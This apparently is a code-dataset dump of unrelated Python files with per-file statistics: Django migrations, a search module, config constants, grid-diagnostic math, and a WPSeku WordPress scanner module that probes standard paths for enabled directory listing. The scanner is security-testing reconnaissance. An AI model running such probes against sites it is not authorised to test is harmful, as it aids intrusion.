field=models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='account.Address', verbose_name='shipping address'),
),
migrations.AlterField(
model_name='order',
name='total_net',
field=django_prices.models.MoneyField(blank=True, currency=settings.DEFAULT_CURRENCY, decimal_places=2, max_digits=12, null=True, verbose_name='total net'),
),
migrations.AlterField(
model_name='order',
name='total_tax',
field=django_prices.models.MoneyField(blank=True, currency=settings.DEFAULT_CURRENCY, decimal_places=2, max_digits=12, null=True, verbose_name='total tax'),
),
migrations.AlterField(
model_name='order',
name='tracking_client_id',
field=models.CharField(blank=True, editable=False, max_length=36, verbose_name='tracking client id'),
),
migrations.AlterField(
model_name='order',
name='user_email',
field=models.EmailField(blank=True, default='', editable=False, max_length=254, verbose_name='user email'),
),
migrations.AlterField(
model_name='order',
name='voucher',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='discount.Voucher', verbose_name='voucher'),
),
migrations.AlterField(
model_name='ordereditem',
name='delivery_group',
field=models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='items', to='order.DeliveryGroup', verbose_name='delivery group'),
),
migrations.AlterField(
model_name='ordereditem',
name='stock',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='product.Stock', verbose_name='stock'),
),
migrations.AlterField(
model_name='orderhistoryentry',
name='comment',
field=models.CharField(blank=True, default='', max_length=100, verbose_name='comment'),
),
migrations.AlterField(
model_name='orderhistoryentry',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='history', to='order.Order', verbose_name='order'),
),
migrations.AlterField(
model_name='orderhistoryentry',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='user'),
),
migrations.AlterField(
model_name='payment',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='payments', to='order.Order', verbose_name='order'),
),
]
| 45.586466 | 181 | 0.626752 | 615 | 6,063 | 5.990244 | 0.193496 | 0.089577 | 0.12215 | 0.141694 | 0.561889 | 0.551846 | 0.371064 | 0.307003 | 0.294788 | 0.280402 | 0 | 0.012865 | 0.243609 | 6,063 | 132 | 182 | 45.931818 | 0.790449 | 0.011216 | 0 | 0.544 | 1 | 0 | 0.192256 | 0.003838 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.064 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5dc93546bee372b907de208f03583a6f68c3b62 | 925 | py | Python | modules/WPSeku/modules/discovery/generic/wplisting.py | Farz7/Darkness | 4f3eb5fee3d8a476d001ad319ca22bca274eeac9 | [
"MIT"
] | 18 | 2020-04-24T06:50:23.000Z | 2022-03-14T08:00:38.000Z | modules/WPSeku/modules/discovery/generic/wplisting.py | Farz7/Darkness | 4f3eb5fee3d8a476d001ad319ca22bca274eeac9 | [
"MIT"
] | null | null | null | modules/WPSeku/modules/discovery/generic/wplisting.py | Farz7/Darkness | 4f3eb5fee3d8a476d001ad319ca22bca274eeac9 | [
"MIT"
] | 5 | 2020-06-28T16:21:22.000Z | 2022-01-30T14:17:32.000Z | #/usr/bin/env python
# -*- Coding: UTF-8 -*-
#
# WPSeku: Wordpress Security Scanner
#
# @url: https://github.com/m4ll0k/WPSeku
# @author: Momo Outaadi (M4ll0k)
import re
from lib import wphttp
from lib import wpprint
class wplisting:
chk = wphttp.UCheck()
out = wpprint.wpprint()
def __init__(self,agent,proxy,redir,time,url,cookie):
self.url = url
self.cookie = cookie
self.req = wphttp.wphttp(
agent=agent,proxy=proxy,
redir=redir,time=time
)
def run(self):
paths = ['/wp-admin','/wp-includes','/wp-content/uploads',
'/wp-content/plugins','/wp-content/themes'
]
try:
for path in paths:
url = wplisting.chk.path(self.url,path)
resp = self.req.send(url,c=self.cookie)
if resp.status_code == 200 and resp._content != None:
if resp.url == url:
wplisting.out.plus('Dir {} listing enabled under: {}'.format(path,resp.url))
except Exception,e:
pass | 24.342105 | 82 | 0.656216 | 131 | 925 | 4.587786 | 0.541985 | 0.044925 | 0.043261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010652 | 0.188108 | 925 | 38 | 83 | 24.342105 | 0.789614 | 0.157838 | 0 | 0 | 0 | 0 | 0.141009 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.038462 | 0.115385 | null | null | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5e19c75c00ba0d6d2f1c4a0eb15f229a98c4904 | 7,259 | py | Python | webapp/search.py | henchan/memfinity | 3860985e29b203f0569f60eea68ffb22aaf34b1f | [
"MIT"
] | null | null | null | webapp/search.py | henchan/memfinity | 3860985e29b203f0569f60eea68ffb22aaf34b1f | [
"MIT"
] | null | null | null | webapp/search.py | henchan/memfinity | 3860985e29b203f0569f60eea68ffb22aaf34b1f | [
"MIT"
] | null | null | null | """High-level search API.
This module implements application-specific search semantics on top of
App Engine's search API. There are two chief operations: querying for
entities, and managing entities in the search facility.
Add and remove Card entities in the search facility:
insert_cards([models.Card])
delete_cards([models.Card])
Query for Card entities:
query_cards(query_string, limit=20) -> search.SearchResults
The results items will have the following fields:
user_key, user_nickname, front, back, info, tag (repeated), added,
modified, source_url
The query_string is free-form, as a user would enter it, and passes
through a custom query processor before the query is submitted to App
Engine. Notably, pass @username to restrict the query to entities
authored by username, and #tag to restrict the query to only documents
matching the given tag. Multiple @usernames or #tags result in an OR
query.
"""
import re
from google.appengine.api import search
from google.appengine.ext import ndb
QUERY_LIMIT = 20
CARD_INDEX_NAME = 'cards'
# Increase this value when _card2doc changes its format so that
# queries can determine the data available on returned documents.
CARD_DOCUMENT_VERSION = '1'
# Ensure we're under the 2000 character limit from
# https://developers.google.com/appengine/docs/python/search/query_strings
MAX_QUERY_LEN = 200
# TODO(chris): it would be better if this module didn't know about
# specific entity types, but instead defined a protocol to get
# metadata from an entity and generate a document.
def insert_cards(cards):
"""Insert or update models.Card entities in the search facility."""
# TODO(chris): should we allow more than 200 cards per call?
assert len(cards) <= 200, len(cards)
card_docs = map(_card2doc, cards)
index = search.Index(name=CARD_INDEX_NAME)
index.put(card_docs)
def delete_cards(cards):
"""Delete models.Card entities from the search facility."""
index = search.Index(name=CARD_INDEX_NAME)
card_doc_ids = map(_card2docid, cards)
index.delete(card_doc_ids)
def query_cards(query_str, limit=QUERY_LIMIT, web_safe_cursor=None,
ids_only=False, user_key=None):
"""Return the search.SearchResults for a query.
ids_only is useful because the returned document IDs are url-safe
keys for models.Card entities.
"""
if web_safe_cursor:
cursor = search.Cursor(web_safe_string=web_safe_cursor)
else:
cursor = None
index = search.Index(name=CARD_INDEX_NAME)
query_processor = _QueryProcessor(
query_str,
name_field='user_nickname',
tag_field='tag',
private_field='private',
user_key_field='user_key',
query_options=search.QueryOptions(limit=limit, cursor=cursor,
ids_only=ids_only),
user_key=user_key)
search_results = index.search(query_processor.query())
# TODO(chris): should this return partially-instantiated
# models.Card instances instead of leaking implementation details
# like we do now?
return search_results
def _card2doc(card):
# TODO(chris): should we include all fields that would be needed
# for rendering a search results item to avoid entity lookup?
tag_fields = [search.AtomField(name='tag', value=tag) for tag in card.tags]
doc = search.Document(
doc_id=_card2docid(card),
fields=[
search.AtomField(name='doc_version', value=CARD_DOCUMENT_VERSION),
search.AtomField(name='user_key', value=card.user_key.urlsafe()),
# TODO(chris): is user_nickname always a direct-match
# shortname, e.g., @chris?
search.AtomField(name='user_nickname', value=card.user_nickname),
# TODO(chris): support HtmlField for richer cards?
search.TextField(name='front', value=card.front),
search.TextField(name='back', value=card.back),
search.TextField(name='info', value=card.info),
search.DateField(name='added', value=card.added),
search.DateField(name='modified', value=card.modified),
search.AtomField(name='source_url', value=card.source_url),
search.AtomField(name='private', value="1" if card.private else "0"),
] + tag_fields)
return doc
def _card2docid(card):
# We set the search.Document's ID to the entity key it mirrors.
return card.key.urlsafe()
def _sanitize_user_input(query_str):
# The search API puts special meaning on certain inputs and we
# don't want to expose the internal query language to users so
# we strictly restrict inputs. The rules are:
#
# Allowed characters for values are [a-zA-Z0-9._-].
# @name is removed and 'name' values returned as a list.
# #tag is removed and 'tag' values returned as a list.
terms, names, tags = [], [], []
for token in query_str.split():
# TODO(chris): allow international characters.
sane_token = re.sub(r'[^a-zA-Z0-9._-]+', '', token)
if sane_token:
if sane_token in ('AND', 'OK'):
continue # ignore special search keywords
elif token.startswith('@'):
names.append(sane_token)
elif token.startswith('#'):
tags.append(sane_token)
else:
terms.append(sane_token)
return terms, names, tags
class _QueryProcessor(object):
"""Simple queries, possibly with @name and #tag tokens.
name_field is the field @name tokens should apply to.
tag_field is the name of the field #tag tokens should apply to.
"""
def __init__(self, query_str,
name_field, tag_field, private_field, user_key_field,
query_options=None, user_key=None):
self.query_str = query_str
self.name_field = name_field
self.tag_field = tag_field
self.private_field = private_field
self.user_key_field = user_key_field
self.query_options = query_options
self.user_key = user_key
def _sanitize_user_input(self):
query_str = self.query_str[:MAX_QUERY_LEN]
return _sanitize_user_input(query_str)
def _build_query_string(self):
terms, names, tags = self._sanitize_user_input()
# Our simply query logic is to OR together all terms from the
# user, then AND in the name or tag filters (plus a privacy clause).
parts = []
if terms:
parts.append(' OR '.join(terms))
if names:
parts.append('%s: (%s)' % (self.name_field, ' OR '.join(names)))
if tags:
parts.append('%s: (%s)' % (self.tag_field, ' OR '.join(tags)))
# Don't return cards that other users have marked private...
privacy = '%s: 0' % self.private_field
if self.user_key:
# ... but always show the user their own cards in results.
privacy += ' OR %s: (%s)' % (self.user_key_field, self.user_key)
parts.append('(' + privacy + ')')
return ' AND '.join(parts)
def query(self):
query = search.Query(
query_string=self._build_query_string(),
options=self.query_options)
return query
| 37.035714 | 81 | 0.667998 | 993 | 7,259 | 4.728097 | 0.277946 | 0.025346 | 0.024281 | 0.012141 | 0.083493 | 0.034292 | 0.021086 | 0 | 0 | 0 | 0 | 0.005597 | 0.236947 | 7,259 | 195 | 82 | 37.225641 | 0.842029 | 0.402673 | 0 | 0.05 | 0 | 0 | 0.045155 | 0 | 0 | 0 | 0 | 0.010256 | 0.01 | 1 | 0.1 | false | 0 | 0.03 | 0.01 | 0.21 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5e30ec5517ff0e5f54798d022557ddc8306de32 | 445 | py | Python | custom_components/vaddio_conferenceshot/const.py | rohankapoorcom/vaddio_conferenceshot | 71744710df10f77e21e9e7568e3f6c7175b0d11d | [
"Apache-2.0"
] | null | null | null | custom_components/vaddio_conferenceshot/const.py | rohankapoorcom/vaddio_conferenceshot | 71744710df10f77e21e9e7568e3f6c7175b0d11d | [
"Apache-2.0"
] | null | null | null | custom_components/vaddio_conferenceshot/const.py | rohankapoorcom/vaddio_conferenceshot | 71744710df10f77e21e9e7568e3f6c7175b0d11d | [
"Apache-2.0"
] | null | null | null | import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.const import CONF_HOST, CONF_PASSWORD, CONF_PATH, CONF_USERNAME
DOMAIN = "vaddio_conferenceshot"
DATA_SCHEMA = vol.Schema(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
}
)
SERVICE_RECALL_PRESET = "move_to_preset"
ATTR_PRESET_ID = "preset"
| 24.722222 | 82 | 0.750562 | 58 | 445 | 5.482759 | 0.517241 | 0.103774 | 0.141509 | 0.119497 | 0.144654 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161798 | 445 | 17 | 83 | 26.176471 | 0.852547 | 0 | 0 | 0 | 0 | 0 | 0.092135 | 0.047191 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.153846 | 0.230769 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d5e4c8d6143747e9fa0113815e838834d857b208 | 1,022 | py | Python | example/shovel/bar.py | demiurgestudios/shovel | 3db497164907d3765fae182959147d19064671c7 | [
"MIT"
] | 202 | 2015-01-12T13:47:29.000Z | 2022-02-09T19:13:36.000Z | example/shovel/bar.py | demiurgestudios/shovel | 3db497164907d3765fae182959147d19064671c7 | [
"MIT"
] | 14 | 2017-04-09T17:04:53.000Z | 2021-05-16T11:08:34.000Z | example/shovel/bar.py | demiurgestudios/shovel | 3db497164907d3765fae182959147d19064671c7 | [
"MIT"
] | 22 | 2015-09-11T18:35:10.000Z | 2021-05-16T11:04:56.000Z | from shovel import task
@task
def hello(name='Foo'):
'''Prints "Hello, " followed by the provided name.
Examples:
shovel bar.hello
shovel bar.hello --name=Erin
http://localhost:3000/bar.hello?Erin'''
print('Hello, %s' % name)
@task
def args(*args):
'''Echos back all the args you give it.
This exists mostly to demonstrate the fact that shovel
is compatible with variable argument functions.
Examples:
shovel bar.args 1 2 3 4
http://localhost:3000/bar.args?1&2&3&4'''
for arg in args:
print('You said "%s"' % arg)
@task
def kwargs(**kwargs):
'''Echos back all the kwargs you give it.
This exists mostly to demonstrate that shovel is
compatible with the keyword argument functions.
Examples:
shovel bar.kwargs --foo=5 --bar 5 --howdy hey
http://localhost:3000/bar.kwargs?foo=5&bar=5&howdy=hey'''
for key, val in kwargs.items():
print('You said "%s" => "%s"' % (key, val)) | 27.621622 | 65 | 0.614481 | 148 | 1,022 | 4.243243 | 0.385135 | 0.057325 | 0.08121 | 0.095541 | 0.417197 | 0.235669 | 0.200637 | 0.200637 | 0 | 0 | 0 | 0.031788 | 0.261252 | 1,022 | 37 | 66 | 27.621622 | 0.8 | 0.619374 | 0 | 0.25 | 0 | 0 | 0.154362 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.083333 | 0 | 0.333333 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5eefeb4c414f13bc2793346ebb57b29f5de79db | 572 | py | Python | forum/migrations/0001_initial.py | Aerodlyn/mu | 2c3b95e5a83d0f651dd8ad287b471803e1fec3a1 | [
"MIT"
] | 1 | 2021-06-25T22:27:39.000Z | 2021-06-25T22:27:39.000Z | forum/migrations/0001_initial.py | Aerodlyn/mu | 2c3b95e5a83d0f651dd8ad287b471803e1fec3a1 | [
"MIT"
] | 1 | 2022-03-12T00:55:31.000Z | 2022-03-12T00:55:31.000Z | forum/migrations/0001_initial.py | Aerodlyn/mu | 2c3b95e5a83d0f651dd8ad287b471803e1fec3a1 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.7 on 2021-03-26 01:27
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Community',
fields=[
('name', models.CharField(max_length=64, primary_key=True, serialize=False)),
('description', models.TextField()),
('private', models.BooleanField(default=False)),
('slug', models.SlugField()),
],
),
]
| 23.833333 | 93 | 0.552448 | 53 | 572 | 5.924528 | 0.792453 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043702 | 0.31993 | 572 | 23 | 94 | 24.869565 | 0.763496 | 0.078671 | 0 | 0 | 1 | 0 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5eff585130a0defb51fd844556d3dea1143c55d | 18,862 | py | Python | src/ucar/unidata/idv/resources/python/griddiag.py | JessicaWiedemeier/IDV | e5f67c755cc95f8ad2123bdc45a91f0e5eca0d64 | [
"CNRI-Jython"
] | 1 | 2021-06-09T11:24:48.000Z | 2021-06-09T11:24:48.000Z | src/ucar/unidata/idv/resources/python/griddiag.py | JessicaWiedemeier/IDV | e5f67c755cc95f8ad2123bdc45a91f0e5eca0d64 | [
"CNRI-Jython"
] | null | null | null | src/ucar/unidata/idv/resources/python/griddiag.py | JessicaWiedemeier/IDV | e5f67c755cc95f8ad2123bdc45a91f0e5eca0d64 | [
"CNRI-Jython"
] | null | null | null | """
This is the doc for the Grid Diagnostics module. These functions
are based on the grid diagnostics from the GEneral Meteorological
PAcKage (GEMPAK). Note that the names are case sensitive and some
are named slightly different from GEMPAK functions to avoid conflicts
with Jython built-ins (e.g. str).
<P>
In the following operators, scalar operands are named S<sub>n</sub> and
vector operands are named V<sub>n</sub>. Lowercase u and v refer to the
grid relative components of a vector.
"""
def GRAVITY():
""" Gravity constant """
return DerivedGridFactory.GRAVITY;
# Math functions
def atn2(S1,S2,WA=0):
""" Wrapper for atan2 built-in
<div class=jython>
ATN2 (S1, S2) = ATAN ( S1 / S2 )<br>
WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR)
</div>
"""
return GridMath.atan2(S1,S2,WA)
def add(S1,S2,WA=0):
""" Addition
<div class=jython>
ADD (S1, S2) = S1 + S2<br>
WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR)
</div>
"""
return GridMath.add(S1,S2,WA)
def mul(S1,S2,WA=0):
""" Multiply
<div class=jython>
MUL (S1, S2) = S1 * S2<br>
WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR)
</div>
"""
return GridMath.multiply(S1,S2,WA)
def quo(S1,S2,WA=0):
""" Divide
<div class=jython>
QUO (S1, S2) = S1 / S2<br>
WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR)
</div>
"""
return GridMath.divide(S1,S2,WA)
def sub(S1,S2,WA=0):
""" Subtract
<div class=jython>
SUB (S1, S2) = S1 - S2<br>
WA = use WEIGHTED_AVERAGE (default NEAREST_NEIGHBOR)
</div>
"""
return GridMath.subtract(S1,S2,WA)
# Scalar quantities
def adv(S,V):
""" Horizontal Advection, negative by convention
<div class=jython>
ADV ( S, V ) = - ( u * DDX (S) + v * DDY (S) )
</div>
"""
return -add(mul(ur(V),ddx(S)),mul(vr(V),ddy(S)))
def avg(S1,S2):
""" Average of 2 scalars
<div class=jython>
AVG (S1, S2) = ( S1 + S2 ) / 2
</div>
"""
return add(S1,S2)/2
def avor(V):
""" Absolute Vorticity
<div class=jython>
AVOR ( V ) = VOR ( V ) + CORL(V)
</div>
"""
relv = vor(V)
return add(relv,corl(relv))
def circs(S, D=2):
"""
<div class=jython>
Apply a circular aperature smoothing to the grid points. The weighting
function is the circular aperature diffraction function. D is
the radius of influence in grid increments, increasing D increases
the smoothing. (default D=2)
</div>
"""
return GridUtil.smooth(S, "CIRC", int(D))
def corl(S):
""" Coriolis Parameter for all points in a grid
<div class=jython>
CORL = TWO_OMEGA*sin(latr)
</div>
"""
return DerivedGridFactory.createCoriolisGrid(S)
def cress(S, D=2):
"""
<div class=jython>
Apply a Cressman smoothing to the grid points. The smoothed value
is given by a weighted average of surrounding grid points. D is
the radius of influence in grid increments,
increasing D increases the smoothing. (default D=2)
</div>
"""
return GridUtil.smooth(S, "CRES", int(D))
def cros(V1,V2):
""" Vector cross product magnitude
<div class=jython>
CROS ( V1, V2 ) = u1 * v2 - u2 * v1
</div>
"""
return sub(mul(ur(V1),vr(V2)),mul(ur(V2),vr(V1)))
def ddx(S):
""" Take the derivative with respect to the domain's X coordinate
"""
return GridMath.ddx(S);
def ddy(S):
""" Take the derivative with respect to the domain's Y coordinate
"""
return GridMath.ddy(S);
def defr(V):
""" Total deformation
<div class=jython>
DEF ( V ) = ( STRD (V) ** 2 + SHR (V) ** 2 ) ** .5
</div>
"""
return mag(strd(V),shr(V))
def div(V):
""" Horizontal Divergence
<div class=jython>
DIV ( V ) = DDX ( u ) + DDY ( v )
</div>
"""
return add(ddx(ur(V)),ddy(vr(V)))
def dirn(V):
""" North relative direction of a vector
<div class=jython>
DIRN ( V ) = DIRR ( un(v), vn(v) )
</div>
"""
return dirr(DerivedGridFactory.createTrueFlowVector(V))
def dirr(V):
""" Grid relative direction of a vector
"""
return DerivedGridFactory.createVectorDirection(V)
def dot(V1,V2):
""" Vector dot product
<div class=jython>
DOT ( V1, V2 ) = u1 * u2 + v1 * v2
</div>
"""
product = mul(V1,V2)
return add(ur(product),vr(product))
def gwfs(S, N=6):
"""
<div class=jython>
Horizontal smoothing using normally distributed weights
with theoretical response of 1/e for N * delta-x wave.
Increasing N increases the smoothing. (default N=6)
</div>
"""
return GridUtil.smooth(S, "GWFS", int(N))
def jcbn(S1,S2):
""" Jacobian Determinant
<div class=jython>
JCBN ( S1, S2 ) = DDX (S1) * DDY (S2) - DDY (S1) * DDX (S2)
</div>
"""
return sub(mul(ddx(S1),ddy(S2)),mul(ddy(S1),ddx(S2)))
def latr(S):
""" Latitudue all points in a grid
"""
return DerivedGridFactory.createLatitudeGrid(S)
def lap(S):
""" Laplacian operator
<div class=jython>
LAP ( S ) = DIV ( GRAD (S) )
</div>
"""
grads = grad(S)
return div(grads)
def lav(S,level1=None,level2=None, unit=None):
""" Layer Average of a multi layer grid
<div class=jython>
LAV ( S ) = ( S (level1) + S (level2) ) / 2.
</div>
"""
if level1 == None:
return GridMath.applyFunctionOverLevels(S, GridMath.FUNC_AVERAGE)
else:
return layerAverage(S,level1,level2, unit)
def ldf(S,level1,level2, unit=None):
""" Layer Difference
<div class=jython>
LDF ( S ) = S (level1) - S (level2)
</div>
"""
return layerDiff(S,level1,level2, unit);
def mag(*a):
""" Magnitude of a vector
"""
if (len(a) == 1):
return DerivedGridFactory.createVectorMagnitude(a[0]);
else:
return DerivedGridFactory.createVectorMagnitude(a[0],a[1]);
def mixr(temp,rh):
""" Mixing Ratio from Temperature, RH (requires pressure domain)
"""
return DerivedGridFactory.createMixingRatio(temp,rh)
def relh(temp,mixr):
""" Create Relative Humidity from Temperature, mixing ratio (requires pressure domain)
"""
return DerivedGridFactory.createRelativeHumidity(temp,mixr)
def pvor(S,V):
""" Potetial Vorticity (usually from theta and wind)
"""
return DerivedGridFactory.createPotentialVorticity(S,V)
def rects(S, D=2):
"""
<div class=jython>
Apply a rectangular aperature smoothing to the grid points. The weighting
function is the product of the rectangular aperature diffraction function
in the x and y directions. D is the radius of influence in grid
increments, increasing D increases the smoothing. (default D=2)
</div>
"""
return GridUtil.smooth(S, "RECT", int(D))
def savg(S):
""" Average over whole grid
<div class=jython>
SAVG ( S ) = average of all non-missing grid point values
</div>
"""
return GridMath.applyFunctionToLevels(S, GridMath.FUNC_AVERAGE)
def savs(S):
""" Average over grid subset
<div class=jython>
SAVS ( S ) = average of all non-missing grid point values in the subset
area
</div>
"""
return savg(S)
def sdiv(S,V):
""" Horizontal Flux Divergence
<div class=jython>
SDIV ( S, V ) = S * DIV ( V ) + DOT ( V, GRAD ( S ) )
</div>
"""
return add(mul(S,(div(V))) , dot(V,grad(S)))
def shr(V):
""" Shear Deformation
<div class=jython>
SHR ( V ) = DDX ( v ) + DDY ( u )
</div>
"""
return add(ddx(vr(V)),ddy(ur(V)))
def sm5s(S):
""" Smooth a scalar grid using a 5-point smoother
<div class=jython>
SM5S ( S ) = .5 * S (i,j) + .125 * ( S (i+1,j) + S (i,j+1) +
S (i-1,j) + S (i,j-1) )
</div>
"""
return GridUtil.smooth(S, "SM5S")
def sm9s(S):
""" Smooth a scalar grid using a 9-point smoother
<div class=jython>
SM9S ( S ) = .25 * S (i,j) + .125 * ( S (i+1,j) + S (i,j+1) +
S (i-1,j) + S (i,j-1) )
+ .0625 * ( S (i+1,j+1) +
S (i+1,j-1) +
S (i-1,j+1) +
S (i-1,j-1) )
</div>
"""
return GridUtil.smooth(S, "SM9S")
def strd(V):
""" Stretching Deformation
<div class=jython>
STRD ( V ) = DDX ( u ) - DDY ( v )
</div>
"""
return sub(ddx(ur(V)),ddy(vr(V)))
def thta(temp):
""" Potential Temperature from Temperature (requires pressure domain)
"""
return DerivedGridFactory.createPotentialTemperature(temp)
def thte(temp,rh):
""" Equivalent Potential Temperature from Temperature and Relative
humidity (requires pressure domain)
"""
return DerivedGridFactory.createEquivalentPotentialTemperature(temp,rh)
def un(V):
""" North relative u component
"""
return ur(DerivedGridFactory.createTrueFlowVector(V))
def ur(V):
""" Grid relative u component
"""
return DerivedGridFactory.getUComponent(V)
def vn(V):
""" North relative v component
"""
return vr(DerivedGridFactory.createTrueFlowVector(V))
def vor(V):
""" Relative Vorticity
<div class=jython>
VOR ( V ) = DDX ( v ) - DDY ( u )
</div>
"""
return sub(ddx(vr(V)),ddy(ur(V)))
def vr(V):
""" Grid relative v component
"""
return DerivedGridFactory.getVComponent(V)
def xav(S):
""" Average along a grid row
<div class=jython>
XAV (S) = ( S (X1) + S (X2) + ... + S (KXD) ) / KNT
KXD = number of points in row
KNT = number of non-missing points in row
XAV for a row is stored at every point in that row.
</div>
"""
return GridMath.applyFunctionToAxis(S, GridMath.FUNC_AVERAGE, GridMath.AXIS_X)
def xsum(S):
""" Sum along a grid row
<div class=jython>
XSUM (S) = ( S (X1) + S (X2) + ... + S (KXD) )
KXD = number of points in row
XSUM for a row is stored at every point in that row.
</div>
"""
return GridMath.applyFunctionToAxis(S, GridMath.FUNC_SUM, GridMath.AXIS_X)
def yav(S):
""" Average along a grid column
<div class=jython>
YAV (S) = ( S (Y1) + S (Y2) + ... + S (KYD) ) / KNT
KYD = number of points in column
KNT = number of non-missing points in column
</div>
"""
return GridMath.applyFunctionToAxis(S, GridMath.FUNC_AVERAGE, GridMath.AXIS_Y)
def ysum(S):
""" Sum along a grid column
<div class=jython>
YSUM (S) = ( S (Y1) + S (Y2) + ... + S (KYD) )
KYD = number of points in row
YSUM for a column is stored at every point in that column.
</div>
"""
return GridMath.applyFunctionToAxis(S, GridMath.FUNC_SUM, GridMath.AXIS_Y)
def zav(S):
""" Average across the levels of a grid at all points
<div class=jython>
ZAV (S) = ( S (Z1) + S (Z2) + ... + S (KZD) ) / KNT
KZD = number of levels
KNT = number of non-missing points in column
</div>
"""
return GridMath.applyFunctionToLevels(S, GridMath.FUNC_AVERAGE)
def zsum(S):
""" Sum across the levels of a grid at all points
<div class=jython>
ZSUM (S) = ( S (Z1) + S (Z2) + ... + S (KZD) )
KZD = number of levels
ZSUM for a vertical column is stored at every point
</div>
"""
return GridMath.applyFunctionOverLevels(S, GridMath.FUNC_SUM)
def wshr(V, Z, top, bottom):
""" Magnitude of the vertical wind shear in a layer
<div class=jython>
WSHR ( V ) = MAG [ VLDF (V) ] / LDF (Z)
</div>
"""
dv = mag(vldf(V,top,bottom))
dz = ldf(Z,top,bottom)
return quo(dv,dz)
# Vector output
def age(obs,geo):
""" Ageostrophic wind
<div class=jython>
AGE ( S ) = [ u (OBS) - u (GEO(S)), v (OBS) - v (GEO(S)) ]
</div>
"""
return sub(obs,geo)
def circv(S, D=2):
"""
<div class=jython>
Apply a circular aperature smoothing to the grid points. The weighting
function is the circular aperature diffraction function. D is
the radius of influence in grid increments, increasing D increases
the smoothing. (default D=2)
</div>
"""
return GridUtil.smooth(S, "CIRC", int(D))
def cresv(S, D=2):
"""
<div class=jython>
Apply a Cressman smoothing to the grid points. The smoothed value
is given by a weighted average of surrounding grid points. D is
the radius of influence in grid increments,
increasing D increases the smoothing. (default D=2)
</div>
"""
return GridUtil.smooth(S, "CRES", int(D))
def dvdx(V):
""" Partial x derivative of a vector
<div class=jython>
DVDX ( V ) = [ DDX (u), DDX (v) ]
</div>
"""
return vecr(ddx(ur(V)), ddx(vr(V)))
def dvdy(V):
""" Partial x derivative of a vector
<div class=jython>
DVDY ( V ) = [ DDY (u), DDY (v) ]
</div>
"""
return vecr(ddy(ur(V)), ddy(vr(V)))
def frnt(S,V):
""" Frontogenesis function from theta and the wind
<div class=jython>
FRNT ( THTA, V ) = 1/2 * MAG ( GRAD (THTA) ) *
( DEF * COS (2 * BETA) - DIV ) <p>
Where: BETA = ASIN ( (-DDX (THTA) * COS (PSI) <br>
- DDY (THTA) * SIN (PSI))/ <br>
MAG ( GRAD (THTA) ) ) <br>
PSI = 1/2 ATAN2 ( SHR / STR ) <br>
</div>
"""
shear = shr(V)
strch = strd(V)
psi = .5*atn2(shear,strch)
dxt = ddx(S)
dyt = ddy(S)
cosd = cos(psi)
sind = sin(psi)
gradt = grad(S)
mgradt = mag(gradt)
